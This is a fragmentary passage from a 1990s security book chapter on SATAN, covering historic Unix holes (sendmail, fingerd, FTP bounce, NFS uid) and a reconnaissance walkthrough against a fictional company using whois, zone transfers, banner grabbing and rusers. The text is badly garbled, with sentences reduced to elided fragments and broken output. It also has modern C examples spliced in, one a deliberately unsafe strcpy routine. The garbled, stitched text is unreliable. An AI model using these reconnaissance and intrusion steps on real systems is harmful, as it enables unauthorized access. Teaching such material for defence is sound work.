Class 7 through 9 problems are very serious problems; with Internet access a requirement for
most organizations, firewalls are the only barrier between a company’s most guarded data and
intruders
...
SATAN does search for vulnerabilities in this range
...
Under these conditions, SATAN should not find many vulnerabilities in this range
...

A multiuser system intended for payroll management would find a Class 1 hole to be much
less tolerable than a single-user workstation intended for CAD designs
...


SATAN and the Internet Inferno

A multiuser system that served as an inventory control machine for many users might find
Class 3 holes to be a much greater threat than Class 7 holes because of the great importance of
uninterrupted uptime
...

A system with sophisticated users might be vulnerable to Class 3 holes also, because such users
might want to exploit these holes for making configuration changes outside the official system
administration path; for example, a system used by many programmers to do builds of software
packages might be vulnerable to a Class 3 hole when one user uses the hole to make changes to
disk quota settings, makes a mistake, and causes the system to crash
...


System Classifications
The U.S. DoD (Department of Defense) created a computer security classification scale in a document called the “Orange Book” (DOD, 1985a) ... Most Unix systems are C-level, with some claiming C2 compliance or certification ...

An alternative baseline for security classifications could be based on the aforementioned ITL class ratings: a system could be branded based on its highest ITL class problem ... The ideally secure system would be an ITL Class –1 system, probably corresponding to a system that is disconnected from the Internet ...

SATAN attempts to classify systems based on the severity of vulnerabilities found ... It would be quite useful if SATAN used the ITL classification scale: a numerical index is a much better tool for comparing systems and allowing an organization to manage a large number of computers ...


Common Attack Approaches
Before looking at common attacks, it is useful to characterize the attack ...


p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

436

Part II: Gaining Access and Securing the Gateway

When attacking an organization, attacks can be oriented to look for mistakes due to the distributed control of the systems ... Such attacks focus on breadth rather than innovation ... S ...

Attacks against single hosts might take advantage of weaknesses in that host as well as vulnerabilities in “nearby” systems, that is, systems that are trusted by the target system, systems that are connected to the same physical network, or systems that have the same users ... In the second case, attackers can try to install packet sniffers that will capture traffic going to and from the target system ...

Note For more information on spoofing and sniffing, see Chapter 6 ...


Phase One: Get a Login Account
The first goal of any attack on a Unix system is to get a login account and a password ...

Once they have the passwd file, they can run Crack on it and probably guess at least one password ...

Note Crack is a program originally created by Alec Muffett of Sun Microsystems ... By using some intelligent rules, such as permutations on the login name, and a user-provided dictionary of words and names, which can be as large as the user specifies, Crack can be surprisingly effective at quickly guessing passwords ... With a megabyte dictionary, Crack may run for a few days, but it has a high chance of finding even obscure passwords ...



How does an attacker get a login to a target Unix system? First, the hacker gathers information about security holes that exist in different Unix products and ways to exploit these holes ... Finally, the hacker matches the opportunities with the vulnerability information and attempts to gain a login into the system ...

SATAN specifically addresses remote vulnerabilities ...

Warning Absurd as this may sound, the legal implications of running a program such as Crack may be quite severe ... Even though he was working for Intel as a security consultant, Intel had not authorized him to run Crack ...


Phase Two: Get Root Access
The second phase of an attack is not necessarily a network problem ... Some network problems, such as unrestricted NFS access with root permissions for reading and writing, can be used to gain root access ... A better tool for this second phase might be COPS, another program from the makers of SATAN (see Appendix B for details on getting COPS) ... Careful configuration and setup can help to minimize potential vulnerabilities ... (All currently logged in users are listed in the utmp file ... The “last” command will format the wtmp file and provide a complete listing of all logins, including information on the source of the login and the duration of the login ... The syslog files are also extremely useful in monitoring system activity ...



Programs that permit users to gain superuser access, such as sudo, ... Some of these programs, such as osh, provide for control over what root actions are permitted, decreasing the scope of damage that could occur ... (This is described in detail in the “Passwords” section of this chapter ...

Common attack approaches include modifications to login daemons to capture passwords (ftpd, telnetd, rlogind, login), addition of packet sniffers that capture the passwords of network traffic and send them back to the intruder, and masquerade attacks that attempt to use trust to gain access ... SATAN does not typically play a role in this third phase ... Then the burglar either looks for car keys left above the visor, or hotwires the car (second phase) ... As SATAN may have gathered information about other important hosts (NFS servers or NIS servers), this third phase may use that information to focus attacks on gathering access to those systems ...

A competent intruder can easily cover his tracks by modifying accounting and auditing records ... This package comes with source for programs such as ps, ls, sum, and who; the system administrator is no longer able to determine the integrity of binaries because the sum command gives tainted information ... Fortunately, rootkit is quite difficult to find—the primary distribution method has not been through FTP archives ... The COPS program can help do this ...


An Overview of Holes
At this point, the general approach of a network attack should be clear ... The following holes have been patched by most vendors and announced by CERT or the vendors; however, similar holes are frequently re-opened in new releases, and many system administrators are slow to apply patches ...

Unlike misconfiguration errors, which are described in detail later in the chapter, these security holes have arisen due mostly to software programming mistakes in the network daemons ... An example of adding a scan to SATAN is included at the end of this chapter ... , 1993) gives a breakdown of the source of 50 security flaws ...


sendmail -d Debug Hole
A recent sendmail hole involved the -d command-line option, which permits a user to specify a debug level ... By specifying a very large value to the debug option of sendmail, a user could overwrite the stack frame and cause unexpected commands to be executed ... SATAN scans for versions of sendmail that are old enough to include this security hole ...

... com < /etc/passwd as the sender of a message, and then indicating a bad recipient name, sendmail would accept the message, attempt to send to the bad recipient, realize that user did not exist, and bounce an error message back to the sender ... Sendmail was not smart enough to prevent senders from being programs ...


sendmail syslog Buffer Problem
sendmail, along with many other programs, uses syslog() calls to send information to the syslogd daemon ... The syslog() call would invoke the vsprintf() libc call and overflow the stack frame for the vsprintf() call ... A hacker script was made available to gain root access on Sun OS systems by writing long information into the appropriate fields of an SMTP transfer, causing the remote sendmail to invoke a root shell ...

... The buffer allocated for the string was 512 bytes long, but the fingerd program did not check to see that the read was greater than 512 bytes before exiting the subroutine ... The stack could be rewritten to permit the intruder to create a new shell and execute commands ...
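The fingerd mistake above, a fixed 512-byte request buffer filled by a read that never compares its length against the buffer, is shown here as an added example (not code from the book or from fingerd) beside a bounded reader that rejects over-long requests instead of truncating them. The stream type and function names are hypothetical; the input is a constructed request.

```c
/* Added example, not from the book or any fingerd: the unchecked fill of a
 * fixed 512-byte buffer beside a bounded reader that refuses a request that
 * does not fit. Names here are hypothetical. */
#include <stdio.h>
#include <string.h>

#define REQ_BUF 512   /* the buffer size quoted in the text */

/* A minimal in-memory byte stream standing in for the network socket. */
struct req_stream { const char *data; size_t len; size_t pos; };

static int stream_getc(struct req_stream *s)
{
    return s->pos < s->len ? (unsigned char)s->data[s->pos++] : EOF;
}

/* The vulnerable shape: nothing ties the copy length to the buffer length.
 * Shown for contrast only; never call it on input of unknown length. */
static void fill_request_unchecked(char dst[REQ_BUF], const char *src)
{
    strcpy(dst, src);   /* overflows dst when strlen(src) >= REQ_BUF */
}

/* Bounded replacement. Stores one line (newline stripped) of at most cap-1
 * bytes and returns its length. Returns -1 when the line does not fit,
 * after draining the rest of that line, so the caller drops the request
 * rather than acting on a truncated one. */
int read_request_bounded(struct req_stream *in, char *buf, size_t cap)
{
    size_t n = 0;
    int c;
    if (cap == 0)
        return -1;
    while ((c = stream_getc(in)) != EOF && c != '\n') {
        if (n + 1 >= cap) {                 /* no room for this byte plus NUL */
            while ((c = stream_getc(in)) != EOF && c != '\n')
                ;                           /* drain the rest of the line */
            buf[0] = '\0';
            return -1;
        }
        buf[n++] = (char)c;
    }
    buf[n] = '\0';
    if (n == 0 && c == EOF)                 /* nothing at all was read */
        return -1;
    return (int)n;
}

/* Returns the accepted length of a request given as a string, or -1. */
int request_len_of(const char *text)
{
    char buf[REQ_BUF];
    struct req_stream s = { text, strlen(text), 0 };
    return read_request_bounded(&s, buf, sizeof buf);
}

/* Feeds a constructed 700-byte request (longer than REQ_BUF) to the bounded
 * reader and reports whether it was rejected: 1 = rejected, 0 = accepted. */
int overlong_request_rejected(void)
{
    char req[701];
    memset(req, 'A', 700);
    req[700] = '\0';
    return request_len_of(req) == -1;
}

int main(void)
{
    char ok[REQ_BUF];
    fill_request_unchecked(ok, "alice");    /* safe only because "alice" is short */
    printf("unchecked copy of a short name: %s\n", ok);
    printf("bounded read of \"alice\\n\": %d\n", request_len_of("alice\n"));
    printf("700-byte request rejected: %d\n", overlong_request_rejected());
    return 0;
}
```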


hosts ... equiv file, in addition to the hostname, that user on that remote host could specify the username of any user on the system and gain access ... equiv that contained the line halifax julie, the user julie on the remote system halifax could gain access as any user on system george ... .rhosts check using a goto call ... (SSL stands for Secure Sockets Layer, a protocol that permits authentication and encryption—the implementations of this protocol involve the use of a library of routines that permit a nearly drop-in replacement of standard socket calls ... ”) So, even though the encryption used IDEA, RC4-120, or Triple-DES, in which the key size is over 120 bits, the key was generated with a random number chosen from a 16- to 32-bit space ... The problem with session keys is that they depend on good random numbers, and no computer can currently easily create a good random number ...

RFC 1750, Randomness Requirements for Security, attempts to address this issue ... netscape ... tar ...


TCP Sequence Guessing Problem
Even though a system has turned off support for the IP source routing option, an intruder can fool that system into believing that it is communicating with a trusted host ... The intruder now initiates a new connection using the IP address of a trusted system ... equiv file that indicates host B to be trusted ... To carry on the masquerade, the intruder needs to ACKnowledge each TCP packet from the target ... So, when the target system sent the response packet to the real trusted system, which discarded it because no active listener was available, the intruder quickly sent back the appropriate acknowledge packet to complete the TCP connection ... equiv trust by hostname mechanism ... Although this does not prevent an intruder from guessing it, it does make guessing much more difficult ... If they do have physical access, hijacking of existing connections can be done ...


ftpd Server Bounce Problem
The proxy server feature of ftpd was created to permit third-party transfers of files ... This feature, actually specified in the RFC requirements, when combined with the quote command, the PORT statement, and the PASV statement, permits a user to avoid IP access controls and traceability ... So, the user could request the remote ftpd to send a file containing valid network protocol commands to a server program listening on any TCP port on any host, causing that server to believe that the source of the network protocol connection is the remote ftpd ... S ... The MIT ftpd screens out IP addresses from outside the U.S., in an attempt to comply with U.S. export restrictions of cryptographic material ... S ... The French user ftps to her own machine and puts it into a PASV mode, then does a STOR of a new file, say foobar ... S ... These statements include a PORT command with the IP address and port number of the French ftpd that is doing a passive listen and STOR, as well as a subsequent RETR to retrieve the desired file ... S ... Finally, the French user specifies a quote RETR command to the U.S. ftpd for the text file containing the command statements ... S ... S ... The MIT file is therefore sent to the French ftpd and stored as foobar on that site, whereas the MIT ftpd logs indicate that the file was sent to the U.S. ftpd ... Completely untraceable e-mail or Usenet news postings could be done this way, which would be a benign use of this hole ...

The only way to avoid this is to turn off proxy functionality completely ... org/random/ftp-attack for full details on this hole and the suggested fix to ftpd ...
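A server-side check for the bounce problem, as an added example that is not from the book or from any ftpd: the PORT argument is parsed, and a data connection is permitted only back to the control connection's own peer and only to an unprivileged port, which is what stops the server from relaying "a file containing valid network protocol commands" to a third host or a well-known service. Function names and the 192.0.2.x/198.51.100.x sample addresses are constructed for the example.

```c
/* Added example, not from the book or any ftpd: a PORT parser plus the policy
 * that defeats the bounce, accepting the data connection only back to the
 * control peer on a port >= 1024. Names are hypothetical. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Parse the PORT argument "h1,h2,h3,h4,p1,p2" into an IPv4 address (host
 * byte order) and a TCP port. Returns 1 on success, 0 on malformed input. */
int parse_port_arg(const char *arg, uint32_t *ip, uint16_t *port)
{
    unsigned v[6];
    const char *p = arg;
    for (int i = 0; i < 6; i++) {
        char *end;
        if (*p < '0' || *p > '9')          /* rejects "", "-1", " 1", "+1" */
            return 0;
        unsigned long x = strtoul(p, &end, 10);
        if (end == p || x > 255)
            return 0;
        v[i] = (unsigned)x;
        p = end;
        if (i < 5) {
            if (*p != ',')
                return 0;
            p++;
        }
    }
    if (*p != '\0')                        /* trailing garbage */
        return 0;
    *ip = (v[0] << 24) | (v[1] << 16) | (v[2] << 8) | v[3];
    *port = (uint16_t)((v[4] << 8) | v[5]);
    return 1;
}

/* Policy: the data connection may go only to the host that opened the
 * control connection, and only to an unprivileged port, so the server cannot
 * be pointed at another host or at a service such as SMTP on port 25.
 * Returns 1 if the PORT command is acceptable, 0 if it must be refused. */
int port_command_allowed(uint32_t peer_ip, const char *arg)
{
    uint32_t ip;
    uint16_t port;
    if (!parse_port_arg(arg, &ip, &port))
        return 0;
    if (ip != peer_ip)                     /* third-party host: the bounce */
        return 0;
    if (port < 1024)                       /* well-known service port */
        return 0;
    return 1;
}

/* Builds a host-order IPv4 address from its dotted quads. */
uint32_t ip4(unsigned a, unsigned b, unsigned c, unsigned d)
{
    return (a << 24) | (b << 16) | (c << 8) | d;
}

int main(void)
{
    /* Constructed sample: the control connection came from 192.0.2.10. */
    uint32_t peer = ip4(192, 0, 2, 10);
    const char *cases[] = {
        "192,0,2,10,4,210",    /* back to the peer on port 1234: allowed */
        "192,0,2,10,0,25",     /* the peer, but port 25 (SMTP): refused */
        "198,51,100,7,4,210",  /* a third host: the bounce, refused */
        "192,0,2,10,4",        /* malformed argument: refused */
    };
    for (size_t i = 0; i < sizeof cases / sizeof cases[0]; i++)
        printf("PORT %-22s -> %s\n", cases[i],
               port_command_allowed(peer, cases[i]) ? "allowed" : "refused");
    return 0;
}
```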
... mountd and causes them to appear to originate from the IP address of the system running portmap ... SATAN does a scan for this portmap vulnerability ...

... If a user created a link from a username to an outside file, sendmail’s delivery agent, such as /bin/rmail, would write the incoming mail file to the linked file ... The user could then mail a new username to root and have it appended to /etc/passwd ...


NFS uid 16-Bit Problem
An NFS server depends on client-side authentication, verifying only the source IP address of the request, so claiming to fix an NFS server vulnerability is a tenuous claim at best ...

However, a user that claimed a client uid of 0 + 2^16 = 65536 would be acceptable to NFS and not get remapped to a new uid ...
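The arithmetic behind the 0 + 2^16 = 65536 claim, as an added example (not code from the book or from any NFS implementation): the root check is applied to the client's 32-bit uid, but the value is then stored in a 16-bit field, so 65536 passes the check and becomes uid 0. The function names, the 16-bit storage and the anonymous uid value are assumptions made for the example.

```c
/* Added example, not from the book or any NFS server: the uid truncation
 * behind the "NFS uid 16-Bit Problem", with the check done on the wrong width
 * beside a version that rejects values the field cannot hold. Hypothetical. */
#include <stdint.h>
#include <stdio.h>

#define UID_NOBODY 65534u   /* assumed anonymous uid that root is remapped to */

/* Vulnerable shape: the root test sees the full 32-bit client uid, but the
 * server keeps only the low 16 bits. Returns the uid the request runs as. */
uint16_t effective_uid_vulnerable(uint32_t client_uid)
{
    if (client_uid == 0)                 /* remap a claimed root */
        return (uint16_t)UID_NOBODY;
    return (uint16_t)client_uid;         /* 65536 -> 0: root after all */
}

/* Fixed shape: refuse anything that does not fit the field, and apply the
 * root remap to the value that will actually be stored. Returns the uid, or
 * -1 for a request that must be rejected outright. */
int32_t effective_uid_fixed(uint32_t client_uid)
{
    if (client_uid > 0xFFFFu)            /* not representable: reject */
        return -1;
    uint16_t stored = (uint16_t)client_uid;
    if (stored == 0)
        return (int32_t)UID_NOBODY;
    return stored;
}

int main(void)
{
    /* Constructed claims, including the 0 + 2^16 case from the text. */
    uint32_t claims[] = { 0u, 1001u, 65536u, 65536u + 1001u };
    for (size_t i = 0; i < sizeof claims / sizeof claims[0]; i++)
        printf("claimed uid %6u: vulnerable -> %5u, fixed -> %6d\n",
               claims[i], effective_uid_vulnerable(claims[i]),
               effective_uid_fixed(claims[i]));
    return 0;
}
```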



arp -f Problem
The arp program uses an -f flag to permit a user to specify a file containing an arp cache to be read ... This means that a regular user can read any root-owned file on the system by specifying that file to arp using the -f option ... Because any user can invoke sendmail (this is required to be able to send mail), and because sendmail does a set-uid to root, this means that sendmail can read any root-owned file ... This meant that a regular user could read any root-owned file on the system by specifying that file to sendmail using the -C option ... Then invoking rwall to send a message to all users would result in that message being written to that file ... .rhosts file could be written by using the appropriate message ...

Note Advice to designers: Notice that several of the security holes are based on the same common mistakes ... Programs that have higher privileges and can manipulate files, by either reading and printing them out or writing them and allowing a user to specify the pathname (write the log to /etc/passwd) or to create a link from the standard pathname, are frequently seen ...

Finally, security that depends solely on hostname or IP authentication can be easily circumvented ... Granted, the vulnerabilities that SATAN scans for are quite widespread and severe in nature; however, SATAN provides a wonderful framework for easily adding scans for new security holes ...



The Internet is a wonderful place to find out about new security holes ... The section at the end of the chapter contains a detailed list of network sites and mailing lists ... Although new groups are always being created, a core set of useful groups can always be depended upon: comp ... unix, comp ... misc, and alt ... A few others, such as comp ... firewalls, comp ... announce, alt ... crypt, are occasionally useful, although these groups contain quite a bit of theory or noise ...

Mailing lists are quite useful, although they can generate quite a bit of uninteresting traffic ... The 8lgm list is very useful in learning about new holes and getting exploitation information, because they frequently post detailed information on vulnerability ...

Other non-security-related mailing lists that directly address Internet services also frequently deal with security ...

The advent of the World Wide Web has resulted in the creation of many Web pages dedicated to security ... S ... A list of Web sites is included in Appendix B ... Perhaps the other vendors have yet to fix this problem, or perhaps the other OS platforms are not yet patched? FTP security archives, such as Wietse Venema’s ftp ... tue ... cert ... tamu ... A list of various FTP archives is included in Appendix B ... sunsite ...

Finally, you should look for updates to SATAN itself, in case scans for new vulnerabilities are added into the base distribution ... The first phase of a network attack consists of gaining information about security holes ... The next part of this phase is gaining information about the target systems ...

The creators of SATAN gained notoriety a few years before SATAN’s release when they published a paper entitled “Improving the Security of Your Site by Breaking Into It” (Farmer & Venema, 1993) ... Work on the paper led the authors to create SATAN, so it is appropriate to try to follow the same approach in learning about SATAN ...

Instead of using a real organization, the example uses a hacker that attempts to gain access to an imaginary company called NotReal Corporation ... The assumption is that the hacker has access to a system on the Internet and will mount the attack from that location, with no additional access over any other network ...


Gathering Information on Systems
What the hacker would like to do is create a map of all the systems in the company, along with version numbers of the OS, lists of the usernames, and a list of the network services that are being run on those systems ... com, the hacker can get back either a list of hosts on the notreal.com network ... Sometimes, the whois output contains a prepared message that includes a nicely formatted list of the domain servers along with system admin names ... )


For example, here is what the hacker might see as a result of doing a whois notreal:

# whois
Notreal
Notreal
Notreal
Notreal
... COM
- Bldg 11 (NET-NSOFT-1) NSOFT-1
123 ... 67 ... COM
Corporation (NOB3-DOM)
NOB ...

> set type=any
> notreal ...
hackersystem ... 2 ... 4
Non-authoritative answer:
notreal.com   nameserver = dns1 ... COM
notreal.com   nameserver = dns ... COM
notreal.com   preference = 10, mail exchanger = mail ... com
notreal.com   preference = 20, mail exchanger = m2 ... com

Authoritative answers can be found from:
notreal ...
notreal.com   nameserver = dns ... COM
DNS1 ... COM   internet address = 12 ... 56 ...
SOMEBODYELSE ... 45 ... 89
mail ... com   internet address = 123 ... 67 ...
notreal ... 456 ... 9
>

The hacker already has a few hosts by using whois and nslookup ... com map from the DNS server named, running on the dns1 ... com system ... Any system can usually request these ... 9 ... ) The hacker uses the program named-xfer to do exactly that:

% named-xfer -d notreal ... notreal 12 ... 56 ... notreal
$ORIGIN notreal ...
notreal   IN   SOA   dns1 ... com ... dns1 ... com ... notreal ...
$ORIGIN dns1 ... com ...



The hacker is now getting a much better picture of the hosts in the notreal ... He or she would like to find out how many of these hosts are directly connected to the Internet and how many are behind a firewall ... Even better, the fping command can do this most efficiently and is shipped with SATAN ... notreal file to list out all the hosts in the notreal ... This aids the hacker in generating a list of systems directly on the Internet:

% cat notreal ...
notreal ...
notreal ...
notreal ...
notreal ...
notreal ...

% fping < notreal ...
notreal ...
notreal ...
notreal ...
notreal ...
notreal ...

The hacker now starts looking at the systems that are connected to the Internet ...


telnetd Information
The quickest way to identify the OS type is by attempting to telnet to the systems ... notreal ...

Connected to sys4 ... com ...

HP-UX sys4 A ... 04 U 9000/847 (ttyp4)
login:

This system is an HP-UX 9 ...

The banner lines from the telnetd prompt of other systems in notreal ... notreal ...

dns1 ... com
UNIX(r) System V Release 4 ...

No assumptions can be made of the OS type ... x system, but this banner is no guarantee that the remote system is indeed a Solaris 2 ...

m3 ... com
IRIX System V ...

Note While the hacker is telneting to the SGI system, he will try to log in with the account names that, by default, have no passwords on SGI systems ... (Actually, many Unix systems still use the guest login with a guest password ... notreal ... It probably is a Sun OS 4 ...

sys3 ... com
AIX Version 4
(c)Copyrights by IBM and by others 1982, 1994 ... 0 ...

A true intruder would first try to build up a database of all possible telnetd banners from as many systems as possible, to characterize all the possible OS sources of a particular banner ... SATAN uses the banner information to quickly identify systems ... If users ever telnet to your system across the Internet, have them change their password as soon as they return to the internal company system ... This is also the case for rlogin, rexec, and FTP ... Some variables can be quite dangerous to pass in ... See the recent CERT advisory on telnetd for more information (CERT CA:95-14) ... It also allows an unauthorized user to sometimes issue commands, such as system, help, and others ... If it is available, the hacker then tries to exploit possible problems with ftpd ...

Anonymous FTP is useful in helping the intruder build up a database of information on the target system ...

% ftp m2 ... com
Connected to m2 ... com ... 60) ready ...

Password:
230 Guest login ok, access restrictions apply ...

Using binary mode to transfer files ...

Many Internet services, such as ftpd or sendmail, offer help in response to a help command ... The following shows a list of commands offered by the preceding ftpd:

!          delete       mget       quit       status
$          dir          mkdir      quote      struct
account    disconnect   mls        recv       sunique
append     form         mode       reget      system
ascii      get          modtime    rename     tenex
bell       glob         mput       reset      trace
binary     hash         newer      restart    type
bye        help         nlist      rhelp      umask
case       idle         nmap       rmdir      user
cd         image        ntrans     rstatus    verbose
cdup       lcd          open       runique    ?
chmod      ls           prompt     send
close      macdef       proxy      sendport
cr         mdelete      put        site
debug      mdir         pwd        size

The m2 is a Digital Unix system, running OSF/1 ... The help command provides the hacker with a number of useful tidbits: the site command is available, as are proxy, quote, system, sendport, and other useful commands ...

% ftp dns1 ... com
Connected to dns1 ... com ... 0) ready ...

Login failed ...

ftp>

The hacker gets no information from the ftp prompt and no information from the system prompt ... 4 system, but such a prompt is no guarantee that the system is a Solaris 2 ... For the sake of brevity, the subsequent ftp transactions have been edited to remove redundant information such as username and password prompts ... notreal ... notreal ...

220 m3 FTP server ready ...

This came from an SGI IRIX system, but there is no way to tell that for sure from this prompt ... notreal ... notreal ...

220 m4 FTP server (SunOS 4 ...

This is a Sun OS 4 ... The hacker does not need to use the system command ... )

% ftp mail ... com
220 mail FTP server (Version wu-2 ...

This one is interesting ... This popular ftpd offers extensive functionality ... Unfortunately, wu-ftpd gives no information on the system type ... notreal ... 1 Sat Aug 27 17:18:21 CDT 1994) ready ... 1 is an IBM AIX version number; however, the BSD-44 does not guarantee that the system is an IBM AIX source, because others could give this same answer ... notreal ... notreal ...

220 sys4 FTP server (Version 1 ... 193 ...

ftp> system
215 UNIX Type: L8

This system gives no information at all; it came from an HP-UX 9 ... The only thing that might give it away is the version number, but this is no certainty, because other versions of Unix might put a similar RCS type number in the Version banner ...

sendmail is a great source of security holes, because it typically runs set-uid to root, consists of tens of thousands of lines of C code, has a large and complex configuration file that is customized by every user, and is run on every host that acts as a transport agent for e-mail on the Internet ... The Macs or PCs do not typically act as mail transport agents on the Internet ... He could also use EXPN (expand), HELP, and VRFY to identify information such as the identity of the postmaster (a requirement for all mail hosts), root, guest, webmaster, ftp, uucp, lp, and www ...

If sendmail is configured to permit EXPN, the sendmail aliases file is read and the expansion corresponding to the entry is returned ... A utility program, expand_alias, is available that can automate expansion searches ... com:

% telnet dns1 ... com 25
220 dns1 ... com ... 0/SMI-SVR4 ready at Sat, 11 Nov 95 19:47:37 PST

Note sendmail typically reports back the version of the binary as the first field after the name sendmail in the initial banner, followed by a / and the version of the configuration file ... cf file and may differ on some machines ... 0 version, and the config file has an SMI-SVR4 version ... , and 5 ... 0 or Solaris 2 ...

% telnet m2 ... com 25
Connected to m2 ... com ... 65v3 ... 1 ... 6) Sat, 11 Nov 1995 20:04:27

The binary says 5 ... 2, which indicates that it is version 5 ... The 3 ... Recall from the ftpd banner that this system is a DEC OSF/1 box ... It appears to be an RCS version number ...

% telnet m3 ... com 25
220 m3 ... com Sendmail 931110 ... SGI ready at Sat, 11 Nov 95 19:54:12 -0800

This is clearly the SGI system ... SGI) and sendmail config file (930416 ... This is useful if a hacker finds that a sendmail security hole occurred after the given date in the header string ... A hacker can find details on that by studying the CHANGES file for the latest sendmail available from UCB ... notreal ...

Sendmail 4 ... 1 ready at Sat, 11 Nov 95 19:53:48 PST

SMI tells you that this is a Sun OS, and 4 ... There is no information on the version of sendmail, although you can make assumptions based on the OS version ... notreal ... notreal ...

1/UCB 5 ... 03 ready at Sat, 11 Nov 1995 20:22:55 -0800

This banner is quite clear about the OS version (IBM AIX 4 ... 64) ...

% telnet mail ... com 25
220 mail ... com ESMTP Sendmail 8 ... 7; Sat, 11 Nov 1995 20:05:52 -0800 (PST)

This system is running the latest version of sendmail from the UCB distribution ... notreal ... notreal ... 37 ... 8/15 ... Although the ftpd on HP-UX did not announce the OS type, the sendmail daemon does ...



Note The amount of information gained by interrogating each network daemon on the target systems can easily overwhelm an intruder ... In the absence of such a tool, perhaps a spreadsheet or custom database could help maintain the information ...

... cs ... edu (currently 8 ... 2) nearly always has patches for all known holes ... Using smrsh and a small list of permissible programs can also improve your sendmail security, as can disabling VRFY and EXPN, although this does remove some of the usefulness of the e-mail infrastructure ...

... conf file, which contains a list of services offered by inetd ... The hacker can write similar socket programs to do this, but it is, once again, much easier to use SATAN ... ” The /etc/services file provides a list that can be used to make assumptions on the service listening to the port that accepted a connect during the scan ... For example:

% more /etc/services
# This file associates official service names and aliases with
# the port number and protocol the services use ...

% telnet dns1 echo
Trying ... notreal ...

Escape character is ‘^]’ ...

% telnet sys3 echo
Trying ...

Connected to dns1 ... com ...

Sat Nov 11 22:22:34 1995
Connection closed by foreign host ...

For manual TCP scans, a hacker can use telnet or the SATAN TCP scanner ... Other port scanners are available at FTP archives such as COAST ... Wietse Venema’s tcp_wrappers is one of the most popular such programs, although several vendors include similar functionality into inetd, via inetd ... Xinetd also offers a good deal of flexibility in controlling services and minimizing risks ... The hacker has also gained information on which services are offered on the remote system ... The hacker can use SATAN to scan hundreds of hosts for this information in a few seconds ... Although manual scans, as demonstrated in this section, are useful for understanding and expanding SATAN, they are quite slow and inefficient ... The most popular rpc services are NIS and NFS, both of which offer much to the intruder ... A hacker looking at the notreal ... notreal ...

The others are useful too, so the hacker records all this information into an ever-expanding database ... All three of these services have been associated with security holes ... The newer version of portmap is called rpcbind; it still features the same issues ... A system admin can configure this portmap to respond only to requests from authorized network addresses ... This program also includes several security improvements such as the elimination of request forwarding ... SATAN focuses on the first phase of a network attack, gaining remote access, and does not try to interrogate the bootpd server; however, the bootpd server offers an intruder an excellent way to carry out phase three of an attack ... SATAN will list the systems running bootpd, and the vigilant intruder will try to attack these systems once he or she has gained access to any system on the same LAN segment ...
The ping causes the compromised system to generate an ARP request packet that the remote server responds to with a packet containing its LAN address ...
This requires the hacker to be on the same LAN segment, or else the LAN address is just that of the nearest router ... This discussion of bootpd is related to the third phase of an attack: extended access by using additional vulnerabilities, in this case vulnerabilities only available to systems on the same LAN ... Therefore, a more realistic attack might come from a brute force sequencing through all the possible LAN addresses ... The last three parts vary by system, offering a total of 255×255×255 = 16 million combinations ... Some intelligent sequencing may even be possible ...

Assuming that the hacker is able to get the LAN address, the hacker can now get information on the boot file that the bootpd (dhcp) server offers to boot clients ... ) Here is an example of being on the same LAN and using ping to grab the LAN address:

% ping sys4 ... com
PING sys4 ... com: 64 byte packets
64 bytes from 12 ... 45 ... time=2 ...
notreal ... 3 ... 67) at 8:0:9:01:23:45 ether
% bootpquery 080009012345
Received BOOTREPLY from m4 ... com (12 ... 45 ... 3 ... 67
/usr/lib/uxbootlf ... 255 ... 0
Gateway:   12 ... 45 ... 3 ... 56
Host Name: sys4
%

The bootpquery program is a simple HP-UX program that generates a bootp request and formats the reply ...



The information returned by bootpd is quite useful ... The bootp packets also indicate a boot server system that supplies boot files and boot configuration information to client systems that boot over the network ...

If the remote systems are using the rpc bootparam method instead of the bootpd method, the hacker can get the information via the portmap program on the systems that showed bootparam on the rpcinfo -p list ... A program called bootparam that gets such information is included as part of SATAN ... The firewalls should be configured to screen out packets on the bootp (67/UDP, 68/UDP, 1067/UDP, 1068/UDP) and portmap ports (111/UDP, 111/TCP) ...

... Although it provides useful information for monitoring remote hosts, it provides even more useful information for hackers who are trying to build up databases of information about the target systems ... A third program, rwho, also provides similar information ...

Then the hacker tries using login names at each system, such as root, bin, guest, ftp, tftp, daemon, sync, and usernames that the hacker has already discovered ...

notreal ... notreal ... notreal ... notreal ... notreal ... notreal ...
No Plan ...
notreal ... notreal ...
No Plan ...
notreal ... notreal ... com
No Plan ...

This information can be useful as vulnerabilities are discovered ... This would permit the hacker to launch ...

Tip Avoid enabling fingerd in inetd ...


The rpc equivalent of fingerd is rusersd ... The output is very similar to who or rwho ... SATAN uses rusers to gather information about remote systems:

% rusers -l mail ... com
bkelley   mail:ttys0   Oct 04 12:23   115:28   (m2 ... com)
perry     mail:ttys2   Oct 25 14:53   607:20   (sys1 ... com)
chris     mail:ttys3   Oct 06 08:16   473:41   (sys2 ... com)
stan      mail:ttys7   Sep 22 10:03   126:18   (m3 ... com)
mabel     mail:ttys9   Oct 16 15:42   447:27   (m4 ... com)
www       mail:ttysb   Oct 10 08:27    65:27   (sys2 ... com)

The third program, rwho, depends on a daemon called rwhod that does periodic network broadcasts of who is on a system to other rwhod programs ... Because the broadcasts don’t go past the local LAN segment, the hacker never sees an update ... yahoo ...


NFS Export Information
For those systems that indicate a mount service via the rpcinfo -p list, the showmount program can interrogate rpc ... The showmount -a command prints out a list of which hosts have mounted the exported file systems.

(showmount output for the notreal ... com hosts, not recoverable from the extraction)

SATAN scans for unrestricted NFS access and indicates this as a potential problem in its reports. The /cdrom file system is probably acceptable, because it is read-only, as long as the cdrom does not contain private information.

The /usr directory is probably acceptable if it is exported read-only, because it usually contains binaries. If the directory is writeable and binaries are owned by non-root users, the integrity of the binaries is at risk. This is a major vulnerability if the system permits ... Xauthority files, or ...


p1vPHCPannex1

Internet Security Pro Ref 577-7

dgarratt 1-31-96

CH 8

LP#4

460

Part II: Gaining Access and Securing the Gateway

By gaining access to the /var/yp directory of a system that is a yp/NIS server, as indicated by the portmap information, you can determine the domain name for yp/NIS. If you have write access to that system via NFS, you can rewrite the passwd map files and distribute them to all the yp/NIS clients in the domain. When used, it should be read-only if possible. Hackers can cope with only so much laughter. These maps include passwd, hosts, aliases, services, and others. There are several ways to get the NIS domain name: the bootparam method (mentioned previously and used by SATAN), the NFS server method (also mentioned previously), and intelligent guessing (also used by SATAN). For example, notreal might be a good guess for the NIS domain for notreal ... The ypx program can help guess a domain name and transfer an NIS map from the NIS server. The hacker could then answer this request and have the client bind to the hacker's system, and distribute the passwd map to this client.

Tip

